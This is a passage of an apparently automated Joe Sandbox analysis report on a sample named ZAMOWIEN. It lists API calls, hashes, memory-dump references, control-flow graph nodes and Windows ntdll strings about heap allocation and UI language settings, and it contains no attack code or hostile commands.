                                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 7050116A
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705011C7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705011D9
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501203
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: efa4f7277b82add51b0e193eb280dae6b66b72f00d0ea3abb898e4ce157cf506
                                                                                  • Instruction ID: 258d03cf67ed70306052c3f6c5625c774bd89fd91cf8af0f5e70fbdf6f0d6009
                                                                                  • Opcode Fuzzy Hash: efa4f7277b82add51b0e193eb280dae6b66b72f00d0ea3abb898e4ce157cf506
                                                                                  • Instruction Fuzzy Hash: BE3182F69002029FD3049F76DD59A2E7FE8EB95210B20051AFB46EB324F774D801CB6A
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                  Execution Graph

                                                                                  Execution Coverage:0%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:100%
                                                                                  Total number of Nodes:1
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 81146 37712a80 LdrInitializeThunk

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 5 377134e0-377134ec LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0356c127f186df716b53763d59bc626812958d42589c928f1dd803b10fa33c9c
                                                                                  • Instruction ID: e397366dbff7fb1f8e22fcdf0dbd83fd338c161377bd46c47c8cb7c5283c35ad
                                                                                  • Opcode Fuzzy Hash: 0356c127f186df716b53763d59bc626812958d42589c928f1dd803b10fa33c9c
                                                                                  • Instruction Fuzzy Hash: 3A90027161510416D5006159461470A100547D0201F62C926E0514968ECBAA895575A2

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 4 37712eb0-37712ebc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b78b81ff6d7238337b10c78201f640204640e516fde6f0f22d5c811f19075154
                                                                                  • Instruction ID: 89f92280eb41f0280c1ba35869f4dc13a3138ef2db51710ef50ca59775d9cc71
                                                                                  • Opcode Fuzzy Hash: b78b81ff6d7238337b10c78201f640204640e516fde6f0f22d5c811f19075154
                                                                                  • Instruction Fuzzy Hash: D390027121140416D5006159491470F000547D0302F52C526E1254955ECA3A88557571

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3 37712d10-37712d1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9deff29507e26b2f3fba158cd52c2487e340ace7a0c6bfc41620a9357d119d9b
                                                                                  • Instruction ID: 456d2dff9b6d329848446b425d79c0d2024caf5ccaa553208ce7895b022b623f
                                                                                  • Opcode Fuzzy Hash: 9deff29507e26b2f3fba158cd52c2487e340ace7a0c6bfc41620a9357d119d9b
                                                                                  • Instruction Fuzzy Hash: 6890027121100427D5116159460470B000947D0241F92C927E0514958EDA6B8956B121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2 37712bc0-37712bcc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0cc54716e8d6e0d8cd5e09f442e1116a9f98bca024a2e56dfd2c78a43e5d206e
                                                                                  • Instruction ID: 06d95dbafbe29c9f788a8e00737313b44879720a4f15b47c8ab6f24e17bb8df9
                                                                                  • Opcode Fuzzy Hash: 0cc54716e8d6e0d8cd5e09f442e1116a9f98bca024a2e56dfd2c78a43e5d206e
                                                                                  • Instruction Fuzzy Hash: 6A90027121100416D5006599550874A000547E0301F52D526E5114955FCA7A88957131

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1 37712b90-37712b9c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5f7283cb9e8c2945ed839ab28d782ba8e69fcd91c0465febcd403295ffdc5e50
                                                                                  • Instruction ID: ffe93bb31bbfcbb6d76268bdafec0d48ceb30a07b744b57e42774f17840d4673
                                                                                  • Opcode Fuzzy Hash: 5f7283cb9e8c2945ed839ab28d782ba8e69fcd91c0465febcd403295ffdc5e50
                                                                                  • Instruction Fuzzy Hash: BF90027121108816D5106159850474E000547D0301F56C926E4514A58ECAAA88957121

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 37712a80-37712a8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a5bbdd7a012f9584d6762b84773f80e213251ef671e21c3d79d36d7f42706994
                                                                                  • Instruction ID: 79e5e672a29897c2846bdff003fcb248c1c669f21b7dda7d1b1ce33e30d2047a
                                                                                  • Opcode Fuzzy Hash: a5bbdd7a012f9584d6762b84773f80e213251ef671e21c3d79d36d7f42706994
                                                                                  • Instruction Fuzzy Hash: A89002A12120001745057159451471A400A47E0201B52C536E1104990EC93A88957125
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 402d1d3c1e9985f84c64e2c59532c51a885d1cb6a542e8b07f86ec6a36044cc2
                                                                                  • Instruction ID: 2e5d6d4f7fb1ca0d606c1ca1daf9407896fd40038574a89516a3e87653efc1f7
                                                                                  • Opcode Fuzzy Hash: 402d1d3c1e9985f84c64e2c59532c51a885d1cb6a542e8b07f86ec6a36044cc2
                                                                                  • Instruction Fuzzy Hash: 01927BB5604341ABE721CF20C890B6BB7E9FB88764F044D2DFA94DB250DB74E844CB96

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 572 37779060-377790a9 573 377790ab-377790b0 572->573 574 377790f8-37779107 572->574 575 377790b4-377790ba 573->575 574->575 576 37779109-3777910e 574->576 578 37779215-3777923d call 37718f40 575->578 579 377790c0-377790e4 call 37718f40 575->579 577 37779893-377798a7 call 37714b50 576->577 588 3777923f-3777925a call 377798aa 578->588 589 3777925c-37779292 578->589 586 377790e6-377790f3 call 377992ab 579->586 587 37779113-377791b4 GetPEB call 3777d7e5 579->587 598 377791fd-37779210 RtlDebugPrintTimes 586->598 599 377791b6-377791c4 587->599 600 377791d2-377791e7 587->600 593 37779294-37779296 588->593 589->593 593->577 597 3777929c-377792b1 RtlDebugPrintTimes 593->597 597->577 607 377792b7-377792be 597->607 598->577 599->600 601 377791c6-377791cb 599->601 600->598 602 377791e9-377791ee 600->602 601->600 605 377791f3-377791f6 602->605 606 377791f0 602->606 605->598 606->605 607->577 608 377792c4-377792df 607->608 609 377792e3-377792f4 call 3777a388 608->609 612 37779891 609->612 613 377792fa-377792fc 609->613 612->577 613->577 614 37779302-37779309 613->614 615 3777930f-37779314 614->615 616 3777947c-37779482 614->616 617 37779316-3777931c 615->617 618 3777933c 615->618 619 3777961c-37779622 616->619 620 37779488-377794b7 call 37718f40 616->620 617->618 624 3777931e-37779332 617->624 625 37779340-37779391 call 37718f40 RtlDebugPrintTimes 618->625 622 37779674-37779679 619->622 623 37779624-3777962d 619->623 633 377794f0-37779505 620->633 634 377794b9-377794c4 620->634 628 3777967f-37779687 622->628 629 37779728-37779731 622->629 623->609 627 37779633-3777966f call 37718f40 623->627 630 37779334-37779336 624->630 631 37779338-3777933a 624->631 625->577 658 37779397-3777939b 625->658 651 37779869 627->651 637 37779693-377796bd call 37778093 628->637 638 37779689-3777968d 628->638 629->609 635 37779737-3777973a 629->635 630->625 631->625 645 37779507-37779509 633->645 646 37779511-37779518 633->646 640 377794c6-377794cd 634->640 641 377794cf-377794ee 634->641 642 37779740-3777978a 635->642 643 377797fd-37779834 call 37718f40 635->643 664 377796c3-3777971e call 37718f40 RtlDebugPrintTimes 637->664 665 37779888-3777988c 637->665 638->629 638->637 640->641 650 37779559-37779576 RtlDebugPrintTimes 641->650 648 37779791-3777979e 642->648 649 3777978c 642->649 676 37779836 643->676 677 3777983b-37779842 643->677 652 3777950f 645->652 653 3777950b-3777950d 645->653 654 3777953d-3777953f 646->654 661 377797a0-377797a3 648->661 662 377797aa-377797ad 648->662 649->648 650->577 681 3777957c-3777959f call 37718f40 650->681 663 3777986d 651->663 652->646 653->646 659 37779541-37779557 654->659 660 3777951a-37779524 654->660 667 3777939d-377793a5 658->667 668 377793eb-37779400 658->668 659->650 673 37779526 660->673 674 3777952d 660->674 661->662 671 377797af-377797b2 662->671 672 377797b9-377797fb 662->672 670 37779871-37779886 RtlDebugPrintTimes 663->670 664->577 701 37779724 664->701 665->609 678 377793a7-377793d0 call 37778093 667->678 679 377793d2-377793e9 667->679 680 37779406-37779414 668->680 670->577 670->665 671->672 672->670 673->659 682 37779528-3777952b 673->682 684 3777952f-37779531 674->684 676->677 685 37779844-3777984b 677->685 686 3777984d 677->686 689 37779418-3777946f call 37718f40 RtlDebugPrintTimes 678->689 679->680 680->689 704 377795a1-377795bb 681->704 705 377795bd-377795d8 681->705 682->684 692 37779533-37779535 684->692 693 3777953b 684->693 687 37779851-37779857 685->687 686->687 695 3777985e-37779864 687->695 696 37779859-3777985c 687->696 689->577 708 37779475-37779477 689->708 692->693 694 37779537-37779539 692->694 693->654 694->654 695->663 702 37779866 695->702 696->651 701->629 702->651 706 377795dd-3777960b RtlDebugPrintTimes 704->706 705->706 706->577 710 37779611-37779617 706->710 708->665 710->635
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $ $0
                                                                                  • API String ID: 3446177414-3352262554
                                                                                  • Opcode ID: eb3186bdc2f3c13e548b327767d905de9d688f799ff7283fdb96e311f8c3a874
                                                                                  • Instruction ID: 1ecc9ffb7fe8c95847f8d8ae1d09fe5b3ffaade531b82ab3fdfec40eb1d4d063
                                                                                  • Opcode Fuzzy Hash: eb3186bdc2f3c13e548b327767d905de9d688f799ff7283fdb96e311f8c3a874
                                                                                  • Instruction Fuzzy Hash: 353223B16093818FE750CF68C884B6BBBE5BF88354F44492EF5998B290D774E948CF52
                                                                                  Strings
                                                                                  • @, xrefs: 37775DF7
                                                                                  • @, xrefs: 37775BA7
                                                                                  • @, xrefs: 37775F20
                                                                                  • Control Panel\Desktop, xrefs: 37775CDE
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 37775B61
                                                                                  • @, xrefs: 37775FFA
                                                                                  • LanguageConfiguration, xrefs: 37775FA0
                                                                                  • PreferredUILanguagesPending, xrefs: 37775D52
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 37775EDD
                                                                                  • @, xrefs: 37775D30
                                                                                  • PreferredUILanguages, xrefs: 37775F51
                                                                                  • InstallLanguageFallback, xrefs: 37775BD0
                                                                                  • LanguageConfigurationPending, xrefs: 37775DA1
                                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 37775604
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1325123933
                                                                                  • Opcode ID: 454cf4c0dbec93c5fd6b3fb2e76d662c4bdb5c14a6ced178262645fdb2f684ae
                                                                                  • Instruction ID: 78025498a16a77f3d1a1181d75b306982b6d7f254270574b51f473bd84e0defb
                                                                                  • Opcode Fuzzy Hash: 454cf4c0dbec93c5fd6b3fb2e76d662c4bdb5c14a6ced178262645fdb2f684ae
                                                                                  • Instruction Fuzzy Hash: FA7228B55083819BD760CF24C850B7BB7EAAF88794F404D2DF999DB250EB34E905CB92

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1210 3777fdf4-3777fe16 call 37727be4 1213 3777fe35-3777fe4d call 376c7662 1210->1213 1214 3777fe18-3777fe30 RtlDebugPrintTimes 1210->1214 1219 3777fe53-3777fe69 1213->1219 1220 37780277 1213->1220 1218 377802d1-377802e0 1214->1218 1221 3777fe70-3777fe72 1219->1221 1222 3777fe6b-3777fe6e 1219->1222 1223 3778027a-377802ce call 377802e6 1220->1223 1224 3777fe73-3777fe8a 1221->1224 1222->1224 1223->1218 1226 3777fe90-3777fe93 1224->1226 1227 37780231-3778023a GetPEB 1224->1227 1226->1227 1231 3777fe99-3777fea2 1226->1231 1229 37780259-3778025e call 376cb910 1227->1229 1230 3778023c-37780257 GetPEB call 376cb910 1227->1230 1238 37780263-37780274 call 376cb910 1229->1238 1230->1238 1235 3777fea4-3777febb call 376dfed0 1231->1235 1236 3777febe-3777fed1 call 37780835 1231->1236 1235->1236 1244 3777fed3-3777feda 1236->1244 1245 3777fedc-3777fef0 call 376c753f 1236->1245 1238->1220 1244->1245 1249 3777fef6-3777ff02 GetPEB 1245->1249 1250 37780122-37780127 1245->1250 1251 3777ff04-3777ff07 1249->1251 1252 3777ff70-3777ff7b 1249->1252 1250->1223 1253 3778012d-37780139 GetPEB 1250->1253 1256 3777ff26-3777ff2b call 376cb910 1251->1256 1257 3777ff09-3777ff24 GetPEB call 376cb910 1251->1257 1254 37780068-3778007a call 376e2710 1252->1254 1255 3777ff81-3777ff88 1252->1255 1258 3778013b-3778013e 1253->1258 1259 377801a7-377801b2 1253->1259 1275 37780110-3778011d call 37780d24 call 37780835 1254->1275 1276 37780080-37780087 1254->1276 1255->1254 1260 3777ff8e-3777ff97 1255->1260 1272 3777ff30-3777ff51 call 376cb910 GetPEB 1256->1272 1257->1272 1263 3778015d-37780162 call 376cb910 1258->1263 1264 37780140-3778015b GetPEB call 376cb910 1258->1264 1259->1223 1261 377801b8-377801c3 1259->1261 1267 3777ff99-3777ffa9 1260->1267 1268 3777ffb8-3777ffbc 1260->1268 1261->1223 1269 377801c9-377801d4 1261->1269 1283 37780167-3778017b call 376cb910 1263->1283 1264->1283 1267->1268 1277 3777ffab-3777ffb5 call 3778d646 1267->1277 1279 3777ffce-3777ffd4 1268->1279 1280 3777ffbe-3777ffcc call 37703ae9 1268->1280 1269->1223 1278 377801da-377801e3 GetPEB 1269->1278 1272->1254 1304 3777ff57-3777ff6b 1272->1304 1275->1250 1284 37780089-37780090 1276->1284 1285 37780092-3778009a 1276->1285 1277->1268 1288 37780202-37780207 call 376cb910 1278->1288 1289 377801e5-37780200 GetPEB call 376cb910 1278->1289 1291 3777ffd7-3777ffe0 1279->1291 1280->1291 1305 3778017e-37780188 GetPEB 1283->1305 1284->1285 1295 377800b8-377800bc 1285->1295 1296 3778009c-377800ac 1285->1296 1311 3778020c-3778022c call 3777823a call 376cb910 1288->1311 1289->1311 1302 3777fff2-3777fff5 1291->1302 1303 3777ffe2-3777fff0 1291->1303 1308 377800ec-377800f2 1295->1308 1309 377800be-377800d1 call 37703ae9 1295->1309 1296->1295 1306 377800ae-377800b3 call 3778d646 1296->1306 1312 3777fff7-3777fffe 1302->1312 1313 37780065 1302->1313 1303->1302 1304->1254 1305->1223 1315 3778018e-377801a2 1305->1315 1306->1295 1314 377800f5-377800fc 1308->1314 1326 377800e3 1309->1326 1327 377800d3-377800e1 call 376ffdb9 1309->1327 1311->1305 1312->1313 1319 37780000-3778000b 1312->1319 1313->1254 1314->1275 1321 377800fe-3778010e 1314->1321 1315->1223 1319->1313 1320 3778000d-37780016 GetPEB 1319->1320 1324 37780018-37780033 GetPEB call 376cb910 1320->1324 1325 37780035-3778003a call 376cb910 1320->1325 1321->1275 1335 3778003f-3778005d call 3777823a call 376cb910 1324->1335 1325->1335 1333 377800e6-377800ea 1326->1333 1327->1333 1333->1314 1335->1313
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 3446177414-1700792311
                                                                                  • Opcode ID: 46936660ef05baa7d418de99e795bd86ef461725faf37f0dd00117de7ad9f697
                                                                                  • Instruction ID: 58f27a29e23f91168771bf8c68589493230f20ae7eca490d9972ad9c062e10aa
                                                                                  • Opcode Fuzzy Hash: 46936660ef05baa7d418de99e795bd86ef461725faf37f0dd00117de7ad9f697
                                                                                  • Instruction Fuzzy Hash: 35D1013550078AEFDB01CFA4C452AADBBF2FF4A720F048489E455AF612C739E942CB16
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.o7
                                                                                  • API String ID: 0-73794551
                                                                                  • Opcode ID: 307cf8a3e00451c8033ba8c458fa298efa61d39745ee4b4708407a5dca6a4460
                                                                                  • Instruction ID: 07917fc371939a9be847681b003b7548de0b36aa7426a25681de8673ffe38ae2
                                                                                  • Opcode Fuzzy Hash: 307cf8a3e00451c8033ba8c458fa298efa61d39745ee4b4708407a5dca6a4460
                                                                                  • Instruction Fuzzy Hash: 1BB18CB55083429FD711CE24C4A0B5FB7E8EB84768F41492EF998EB241D734D908CB97
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                  • API String ID: 3446177414-1745908468
                                                                                  • Opcode ID: 87de82ccf6aa449bdf06388dc28ade51d38f41f8809f52ccacdef6ac0fea679e
                                                                                  • Instruction ID: 9351fae73d7122c52ca9d771632a0d62f88d19ce19674e77c5bb4758a3cfb7e3
                                                                                  • Opcode Fuzzy Hash: 87de82ccf6aa449bdf06388dc28ade51d38f41f8809f52ccacdef6ac0fea679e
                                                                                  • Instruction Fuzzy Hash: 5B911175900685DFDF01CFA4C550AADBBF2FF49320F04889AE465AF252CB39A953CB16
                                                                                  Strings
                                                                                  • @, xrefs: 376CD24F
                                                                                  • @, xrefs: 376CD09D
